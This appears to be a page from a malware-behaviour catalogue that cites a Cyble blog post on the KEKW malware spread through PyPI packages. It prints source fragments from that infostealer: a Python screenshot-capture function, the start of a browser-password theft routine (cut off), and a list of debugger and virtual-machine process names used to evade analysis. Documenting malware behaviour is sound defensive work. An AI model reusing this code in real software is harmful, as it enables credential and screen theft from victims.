Romain
Romain
Definition: Malware can capture screenshots of the target system Source: https://blog.cyble.com/2023/05/03/new-kekw-malware-variant-identified-in-pypi-package-distribution/ Sample: ```python def steal_screen(self): image = ImageGrab.grab( bbox=None, include_layered_windows=False, all_screens=True, display=None ) image.save(self.dir + "\\Screenshot.png") image.close() ```
Definition: Malware can collect credentials in browser file using sqlite3 Source: https://blog.cyble.com/2023/05/03/new-kekw-malware-variant-identified-in-pypi-package-distribution/ Sample: ```python def steal_passwords2(self, name: str, path:str, profile:str): path = "path" if not os.path.isfile(path): return loginvault = self.random_dir_create()...
Source: https://blog.cyble.com/2023/05/03/new-kekw-malware-variant-identified-in-pypi-package-distribution/ For instance: ``` "httpdebuggerui" "wireshark" "fiddler" "regedit" "cmd" "taskmgr" "boxservice "df5serv" "processhacker" "vboxtray" "vmtoolsd" "umwarecray "ollydbg" "pestudio' "vmwareuser" "vgauthservice" "vmacthlp' "×96dbg" "ymsrvc" "×32dbg" "vmusrvc" "prl_cc" "prl_tools" "xenservice "gemu-ga"...